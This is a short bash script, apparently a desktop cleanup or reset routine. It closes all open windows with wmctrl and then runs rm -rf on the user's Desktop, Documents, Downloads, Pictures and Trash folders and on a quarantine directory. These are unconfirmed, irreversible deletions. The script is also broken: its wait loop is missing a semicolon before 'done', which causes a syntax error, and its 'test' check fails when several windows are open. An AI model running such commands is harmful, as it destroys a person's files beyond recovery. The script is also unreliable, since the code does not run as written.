#!/bin/bash
WIN_IDs=$(wmctrl -l | cut -f1 -d' ')
for i in $WIN_IDs; do wmctrl -ic "$i"; done
while test $WIN_IDs; do sleep 0.1; WIN_IDs=$(wmctrl -l | cut -f1 -d' ') done

rm -rf ~/Desktop/*
rm -rf ~/Documents/*
rm -rf ~/Downloads/*
rm -rf ~/Pictures/*
rm -rf ~/.local/share/Trash/*
rm -rf ~/quarantine/* && rmdir ~/quarantine
